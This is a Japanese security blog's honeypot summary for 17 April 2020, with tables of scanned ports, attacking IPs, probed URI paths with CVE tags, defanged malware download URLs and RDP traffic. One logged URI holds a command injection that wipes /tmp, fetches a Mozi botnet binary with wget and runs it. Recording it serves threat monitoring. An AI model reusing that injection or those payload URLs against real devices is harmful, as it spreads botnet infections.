sec-chick Blog

サイバーセキュリティブログ

【ハニーポット簡易分析】Honeypot簡易分析(2020/4/17)

RDPの分析を追加してみました。RDPの通信はポート3389宛が多いですが、他のポート宛への通信も結構ありました。

Port(TOP20)

  1. Honeytrap
Port Count
1433 244432 件
445 1785 件
3389 196 件
52869 78 件
5985 51 件
3128 49 件
81 43 件
4500 40 件
9600 40 件
10243 39 件
1471 39 件
10250 39 件
2082 34 件
995 31 件
1194 30 件
7547 30 件
8080 29 件
1110 29 件
1725 29 件
1900 29 件

IP(TOP20)

01 Honeytrap

IP Country Count AbuseIPDB
112[.]30[.]128[.]168 China 29920 件 Link
212[.]118[.]24[.]10 Hashemite Kingdom of Jordan 22929 件 Link
190[.]115[.]3[.]171 Guatemala 21577 件 Link
106[.]240[.]234[.]178 South Korea 21026 件 Link
14[.]241[.]34[.]161 Vietnam 17332 件 Link
222[.]192[.]176[.]38 China 16951 件 Link
205[.]209[.]136[.]122 United States 14810 件 Link
180[.]248[.]222[.]212 Indonesia 14664 件 Link
89[.]252[.]155[.]125 Turkey 12841 件 Link
185[.]202[.]1[.]19 France 11372 件 Link
212[.]77[.]151[.]229 Russia 11254 件 Link
87[.]15[.]172[.]136 Italy 8374 件 Link
180[.]180[.]29[.]21 Thailand 8275 件 Link
190[.]199[.]225[.]162 Venezuela 7267 件 Link
185[.]153[.]35[.]29 Poland 5110 件 Link
80[.]69[.]180[.]108 Russia 4883 件 Link
61[.]153[.]11[.]126 China 4569 件 Link
213[.]242[.]9[.]128 Russia 4469 件 Link
173[.]95[.]47[.]227 United States 4324 件 Link
96[.]225[.]18[.]239 United States 3598 件 Link

02 WOWHoneypot

IP Country Count AbuseIPDB
93[.]174[.]93[.]143 Netherlands 137 件 Link
77[.]247[.]108[.]119 Estonia 8 件 Link
94[.]102[.]49[.]193 Netherlands 5 件 Link
45[.]14[.]151[.]246 Romania 4 件 Link
185[.]53[.]88[.]103 Estonia 4 件 Link
77[.]247[.]109[.]5 Estonia 2 件 Link
102[.]165[.]124[.]90 Nigeria 1 件 Link
45[.]180[.]96[.]223 Brazil 1 件 Link
192[.]241[.]238[.]205 United States 1 件 Link
103[.]220[.]28[.]246 India 1 件 Link
121[.]122[.]168[.]62 Malaysia 1 件 Link
177[.]47[.]192[.]79 Brazil 1 件 Link
170[.]79[.]83[.]242 Brazil 1 件 Link
95[.]232[.]157[.]4 Italy 1 件 Link
82[.]77[.]206[.]149 Romania 1 件 Link
194[.]135[.]224[.]170 Russia 1 件 Link
82[.]79[.]65[.]172 Romania 1 件 Link
109[.]125[.]166[.]184 Iran 1 件 Link
186[.]10[.]63[.]69 Chile 1 件 Link
171[.]67[.]70[.]85 United States 1 件 Link

03 WOWHoneypot(SSL)

IP Country Count AbuseIPDB
93[.]174[.]93[.]143 Netherlands 137 件 Link
77[.]247[.]108[.]119 Estonia 8 件 Link
94[.]102[.]49[.]193 Netherlands 5 件 Link
45[.]14[.]151[.]246 Romania 4 件 Link
185[.]53[.]88[.]103 Estonia 4 件 Link
77[.]247[.]109[.]5 Estonia 2 件 Link
102[.]165[.]124[.]90 Nigeria 1 件 Link
45[.]180[.]96[.]223 Brazil 1 件 Link
192[.]241[.]238[.]205 United States 1 件 Link
103[.]220[.]28[.]246 India 1 件 Link
121[.]122[.]168[.]62 Malaysia 1 件 Link
177[.]47[.]192[.]79 Brazil 1 件 Link
170[.]79[.]83[.]242 Brazil 1 件 Link
95[.]232[.]157[.]4 Italy 1 件 Link
82[.]77[.]206[.]149 Romania 1 件 Link
194[.]135[.]224[.]170 Russia 1 件 Link
82[.]79[.]65[.]172 Romania 1 件 Link
109[.]125[.]166[.]184 Iran 1 件 Link
186[.]10[.]63[.]69 Chile 1 件 Link
171[.]67[.]70[.]85 United States 1 件 Link

URI Path

01 Honeytrap

URI Path Target CVE Count
No uri path - - 262729 件
/ - - 429 件
hxxp://51[.]144[.]0[.]117/pass Unauthorized relay - 123 件
/picsdesc[.]xml Realtek SDK CVE-2014-8361 77 件
/ctrlt/DeviceUpgrade_1 Huawei Home Device - 19 件
/nice - - 16 件
sip:nm Session Initiation Protocol - 16 件
/login[.]action Login Page - 13 件
login[.]cgi D-Link Router - 13 件
/struts2-core-2[.]3[.]8/login[.]action New - 9 件
/portal/client/cms/viewcmspage[.]action New - 9 件
/frame/first[.]action New - 9 件
/notFound[.]action New - 9 件
/struts2_2[.]3[.]15[.]1-showcase/showcase[.]action New - 9 件
/Struts2XMLHelloWorld/User/home[.]action New - 9 件
/admin/agent/default[.]action Administrator - 9 件
/shell MVPower DVR - 6 件
/cgi CGI - 6 件
/admin/assets/js/views/login[.]js FreePBX - 5 件
/jmx JMX - 5 件
/phpMyAdmin/scripts/setup[.]php phpMyAdmin - 4 件
/horde/imp/test[.]php Horde Imp - 4 件
/login Login Page - 4 件
/console - - 4 件
/cgi-bin/test-cgi CGI - 4 件
hxxp://clientapi[.]ipip[.]net/echo[.]php Unauthorized relay - 3 件
hxxp://example[.]com/ Unauthorized relay - 3 件
/tmUnblock[.]cgi Linksys E-series - 2 件
/manager/html Tomcat - 2 件
hxxp://123[.]125[.]114[.]144/ Unauthorized relay - 2 件
/_ping New - 2 件
/asdasdasd - - 2 件
/api/v1/targets api - 2 件
/api/v1/label/version/values api - 2 件
hxxp://112[.]124[.]42[.]80:63435/ Unauthorized relay - 2 件
/ping[.]ccp New - 1 件
/service/extdirect Sonatype Nexus Repository Manager CVE-2019-7238 1 件
/jars Unknown - 1 件
hxxp://insecure[.]org/ Unauthorized relay - 1 件
/stats - - 1 件
/db/manage/ Database - 1 件
/wanicpn[.]xml Unknown - 1 件
/v1[.]40/containers/json New - 1 件
/install[.]php php - 1 件
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}hxxp://192[.]168[.]1[.]1:8088/Mozi[.]a;sh${IFS}/tmp/Mozi[.]a&>r&&tar${IFS}/string[.]js New - 1 件
/v1/agent/self New - 1 件
/v1[.]16/version - - 1 件
/v2/stats/self New - 1 件
/_search Elasticsearch - 1 件
/hudson Unknown - 1 件
hxxp://chek[.]zennolab[.]com/proxy[.]php Unauthorized relay - 1 件
/solr New - 1 件

02 WOWHoneypot

URI Path Target CVE Count
/ - - 26 件
/admin/assets/js/views/login[.]js FreePBX - 8 件
/cgi CGI - 6 件
hxxp://51[.]144[.]0[.]117/pass Unauthorized relay - 4 件
/phpmy/scripts/setup[.]php phpMyAdmin - 3 件
/cgi-bin/mainfunction[.]cgi DrayTek CVE-2020-8515 3 件
/myadmin/scripts/setup[.]php Administrator - 2 件
/scripts/setup[.]php New - 2 件
/pma/scripts/setup[.]php phpMyAdmin - 2 件
/phpMyAdmin/scripts/setup[.]php phpMyAdmin - 2 件
/boaform/admin/formPing Administrator - 2 件
/portal/redlion Unknown - 1 件
/w00tw00t[.]at[.]blackhats[.]romanian[.]anti-sec:) ZmEu - 1 件
/2phpmyadmin/scripts/setup[.]php phpMyAdmin - 1 件
/PMA/scripts/setup[.]php phpMyAdmin - 1 件
/PMA2011/scripts/setup[.]php phpMyAdmin - 1 件
/PMA2012/scripts/setup[.]php phpMyAdmin - 1 件
/PMA2013/scripts/setup[.]php phpMyAdmin - 1 件
/PMA2015/scripts/setup[.]php phpMyAdmin - 1 件
/PMA2016/scripts/setup[.]php phpMyAdmin - 1 件
/PMA2018/scripts/setup[.]php phpMyAdmin - 1 件
/SQL/scripts/setup[.]php SQL - 1 件
/_PHPMYADMIN/scripts/setup[.]php phpMyAdmin - 1 件
/admin/db/scripts/setup[.]php Administrator - 1 件
/admin/mysql/scripts/setup[.]php MySQL - 1 件
/admin/pMA/scripts/setup[.]php phpMyAdmin - 1 件
/admin/phpMyadmin/scripts/setup[.]php phpMyAdmin - 1 件
/admin/scripts/setup[.]php Administrator - 1 件
/admin/setup[.]php Administrator - 1 件
/admin/sql/scripts/setup[.]php SQL - 1 件
/admin/sqladmin/scripts/setup[.]php SQLAdmin - 1 件
/admin/sysadmin/scripts/setup[.]php Administrator - 1 件
/admin/web/scripts/setup[.]php Administrator - 1 件
/administrator/admin/scripts/setup[.]php Administrator - 1 件
/administrator/db/scripts/setup[.]php Administrator - 1 件
/administrator/pma/scripts/setup[.]php phpMyAdmin - 1 件
/administrator/web/scripts/setup[.]php Administrator - 1 件
/blog/phpmyadmin/scripts/setup[.]php phpMyAdmin - 1 件
/cpadmin/scripts/setup[.]php Administrator - 1 件
/cpadmindb/scripts/setup[.]php Administrator - 1 件
/cpanelmysql/scripts/setup[.]php MySQL - 1 件
/cpanelphpmyadmin/scripts/setup[.]php phpMyAdmin - 1 件
/database/scripts/setup[.]php Database - 1 件
/db/db-admin/scripts/setup[.]php Administrator - 1 件
/db/dbadmin/scripts/setup[.]php Administrator - 1 件
/db/dbweb/scripts/setup[.]php Database - 1 件
/db/myadmin/scripts/setup[.]php Administrator - 1 件
/db/phpMyAdmin-3/scripts/setup[.]php phpMyAdmin - 1 件
/db/phpmyadmin/scripts/setup[.]php phpMyAdmin - 1 件
/db/phpmyadmin3/scripts/setup[.]php phpMyAdmin - 1 件
/db/scripts/setup[.]php Database - 1 件
/db/webadmin/scripts/setup[.]php Administrator - 1 件
/db/webdb/scripts/setup[.]php Database - 1 件
/db/websql/scripts/setup[.]php SQL - 1 件
/dbadmin/scripts/setup[.]php Administrator - 1 件
/my/scripts/setup[.]php New - 1 件
/myadmin/setup/index[.]php - - 1 件
/mysql-admin/scripts/setup[.]php MySQL - 1 件
/mysql/admin/scripts/setup[.]php MySQL - 1 件
/mysql/db/scripts/setup[.]php MySQL - 1 件
/mysql/mysqlmanager/scripts/setup[.]php MySQL - 1 件
/mysql/pMA/scripts/setup[.]php phpMyAdmin - 1 件
/mysql/scripts/setup[.]php MySQL - 1 件
/mysql/sqlmanager/scripts/setup[.]php MySQL - 1 件
/mysql/web/scripts/setup[.]php MySQL - 1 件
/mysqladmin/scripts/setup[.]php MySQL - 1 件
/mysqlmanager/scripts/setup[.]php MySQL - 1 件
/p/m/a/scripts/setup[.]php phpMyAdmin - 1 件
/php-my-admin/scripts/setup[.]php phpMyAdmin - 1 件
/php-myadmin/scripts/setup[.]php phpMyAdmin - 1 件
/php/phpmyadmin/scripts/setup[.]php phpMyAdmin - 1 件
/phpLDAPadmin/scripts/setup[.]php Administrator - 1 件
/phpMyAdmi/scripts/setup[.]php phpMyAdmin - 1 件
/phpMyAdmin-2[.]10[.]0[.]0/scripts/setup[.]php phpMyAdmin - 1 件
/phpMyAdmin-2[.]10[.]0/scripts/setup[.]php phpMyAdmin - 1 件
/phpMyAdmin-2[.]11[.]1-all-languages/scripts/setup[.]php phpMyAdmin - 1 件
/phpMyAdmin-2[.]11[.]11[.]3/scripts/setup[.]php phpMyAdmin - 1 件
/phpMyAdmin-2[.]11[.]11/scripts/setup[.]php phpMyAdmin - 1 件
/phpMyAdmin-2[.]5[.]5/index[.]php - - 1 件
/phpMyAdmin-2[.]5[.]5/scripts/setup[.]php phpMyAdmin - 1 件
/phpMyAdmin-2/scripts/setup[.]php phpMyAdmin - 1 件
/phpMyAdmin-3[.]0[.]0[.]0-all-languages/scripts/setup[.]php phpMyAdmin - 1 件
/phpMyAdmin-3/scripts/setup[.]php phpMyAdmin - 1 件
/phpMyAdmin2//setup/index[.]php - - 1 件
/phpMyAds/scripts/setup[.]php phpMyAdmin - 1 件
/phpadmin/scripts/setup[.]php Administrator - 1 件
/phpmanager/scripts/setup[.]php phpMyAdmin - 1 件
/phpmy-admin/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin/setup/index[.]php - - 1 件
/phpmyadmin1/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin2/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin2011/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin2012/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin2013/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin2014/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin2015/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin2017/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin2018/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin3/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin4/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin5/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin6/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin7/scripts/setup[.]php phpMyAdmin - 1 件
/phppgadmin/scripts/setup[.]php Administrator - 1 件
/phppma/scripts/setup[.]php phpMyAdmin - 1 件
/pma2006/scripts/setup[.]php phpMyAdmin - 1 件
/pma2007/scripts/setup[.]php phpMyAdmin - 1 件
/pma2008/scripts/setup[.]php phpMyAdmin - 1 件
/pma2014/scripts/setup[.]php phpMyAdmin - 1 件
/pma2017/scripts/setup[.]php phpMyAdmin - 1 件
/program/scripts/setup[.]php New - 1 件
/setup/index[.]php - - 1 件
/shopdb/scripts/setup[.]php New - 1 件
/sql/myadmin/scripts/setup[.]php SQL - 1 件
/sql/php-myadmin/scripts/setup[.]php SQL - 1 件
/sql/phpMyAdmin/scripts/setup[.]php phpMyAdmin - 1 件
/sql/phpMyAdmin2/scripts/setup[.]php phpMyAdmin - 1 件
/sql/phpmanager/scripts/setup[.]php phpMyAdmin - 1 件
/sql/phpmy-admin/scripts/setup[.]php phpMyAdmin - 1 件
/sql/sql-admin/scripts/setup[.]php SQL - 1 件
/sql/sql/scripts/setup[.]php SQL - 1 件
/sql/sqladmin/scripts/setup[.]php SQLAdmin - 1 件
/sql/sqlweb/scripts/setup[.]php SQL - 1 件
/sql/webadmin/scripts/setup[.]php SQL - 1 件
/sql/webdb/scripts/setup[.]php SQL - 1 件
/sql/websql/scripts/setup[.]php SQL - 1 件
/sqladm/scripts/setup[.]php SQL - 1 件
/sqladmin/scripts/setup[.]php SQLAdmin - 1 件
/sqlmanager/scripts/setup[.]php SQL - 1 件
/sqlweb/scripts/setup[.]php SQL - 1 件
/web/phpmyadmin/scripts/setup[.]php phpMyAdmin - 1 件
/web/scripts/setup[.]php web page - 1 件
/webadmin/scripts/setup[.]php Administrator - 1 件
/webdb/scripts/setup[.]php Database - 1 件
/websql/scripts/setup[.]php SQL - 1 件
/xampp/phpmyadmin/scripts/setup[.]php phpMyAdmin - 1 件
/~/phpmanager/scripts/setup[.]php phpMyAdmin - 1 件
/robots[.]txt robots[.]txt - 1 件
/sitemap[.]xml XML sitemap - 1 件
/[.]well-known/security[.]txt Hidden files - 1 件
/favicon[.]ico favicon - 1 件
/console - - 1 件
/ctrlt/DeviceUpgrade_1 Huawei Home Device - 1 件

03 WOWHoneypot(SSL)

URI Path Target CVE Count
/manager/html Tomcat - 157 件
/admin/assets/js/views/login[.]js FreePBX - 8 件
/ - - 8 件
/owa/auth/logon[.]aspx Microsoft Exchange Server CVE-2018-16793 1 件
//a2billing/customer/templates/default/footer[.]tpl FreePBX - 1 件
/data[.]php New - 1 件
/ajax New - 1 件

Malware

  1. Honeytrap
Malware Count
No Malware 263529 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 17 件
hxxp://51[.]178[.]81[.]75/mips 13 件
hxxp://37[.]49[.]226[.]142/infect 4 件
hxxp://66[.]42[.]87[.]9/adb3 4 件
hxxp://45[.]148[.]10[.]202/bins/enigma[.]mpsl 2 件
hxxp://176[.]123[.]3[.]96/arm7 2 件
hxxp://19ce033f[.]ngrok[.]io/arm7 2 件
hxxp://80[.]82[.]78[.]104/xd 1 件
hxxp://185[.]225[.]19[.]200/rt 1 件
hxxp://185[.]62[.]189[.]18/jaws[.]sh 1 件
hxxp://185[.]172[.]110[.]224/ab/arm7 1 件
hxxp://192[.]168[.]1[.]1:8088/Mozi[.]a 1 件
hxxp://164[.]132[.]92[.]180/xtc[.]arm7 1 件

RDP

Port/IP

Port IP Country Count AbuseIPDB
3389 95[.]47[.]248[.]84 Ukraine 58 件 Link
3389 51[.]195[.]133[.]71 France 17 件 Link
3389 185[.]46[.]150[.]42 Ukraine 6 件 Link
24385 185[.]202[.]1[.]19 France 4 件 Link
18594 185[.]202[.]1[.]19 France 4 件 Link
22866 185[.]202[.]1[.]19 France 4 件 Link
23403 185[.]202[.]1[.]19 France 4 件 Link
18305 185[.]202[.]1[.]19 France 4 件 Link
17413 185[.]202[.]1[.]19 France 4 件 Link
25418 185[.]202[.]1[.]19 France 4 件 Link
17661 185[.]202[.]1[.]19 France 4 件 Link
23577 185[.]202[.]1[.]19 France 4 件 Link
19324 185[.]202[.]1[.]19 France 4 件 Link
24355 185[.]202[.]1[.]19 France 4 件 Link
18434 185[.]202[.]1[.]19 France 4 件 Link
23611 185[.]202[.]1[.]19 France 4 件 Link
17355 185[.]202[.]1[.]19 France 4 件 Link
17312 185[.]202[.]1[.]19 France 4 件 Link
17093 185[.]202[.]1[.]19 France 4 件 Link
19297 185[.]202[.]1[.]19 France 4 件 Link

Port

Port Count
3389 149 件
3390 12 件
3391 12 件
3395 9 件
3388 8 件
33891 8 件
3393 8 件
3397 7 件
3400 7 件
24300 6 件
17588 6 件
18245 6 件
19387 6 件
13389 6 件
18083 6 件
3398 6 件
18592 6 件
3399 6 件
18471 6 件
3344 6 件

IP

IP Country Count AbuseIPDB
185[.]202[.]1[.]19 France 11372 件 Link
194[.]61[.]24[.]64 Netherlands 976 件 Link
185[.]202[.]1[.]10 France 796 件 Link
185[.]202[.]2[.]120 France 454 件 Link
194[.]28[.]112[.]49 Netherlands 195 件 Link
185[.]202[.]1[.]85 France 142 件 Link
185[.]153[.]196[.]239 Russia 126 件 Link
185[.]153[.]199[.]87 Russia 121 件 Link
92[.]63[.]194[.]241 Russia 121 件 Link
92[.]63[.]194[.]21 Russia 119 件 Link
5[.]188[.]206[.]50 United States 83 件 Link
185[.]202[.]1[.]248 France 76 件 Link
185[.]153[.]199[.]81 Russia 76 件 Link
95[.]47[.]248[.]84 Ukraine 58 件 Link
5[.]188[.]206[.]38 United States 50 件 Link
185[.]153[.]199[.]12 Russia 50 件 Link
185[.]153[.]198[.]239 Russia 35 件 Link
185[.]202[.]1[.]249 France 32 件 Link
195[.]54[.]166[.]6 Russia 30 件 Link
185[.]202[.]2[.]149 France 25 件 Link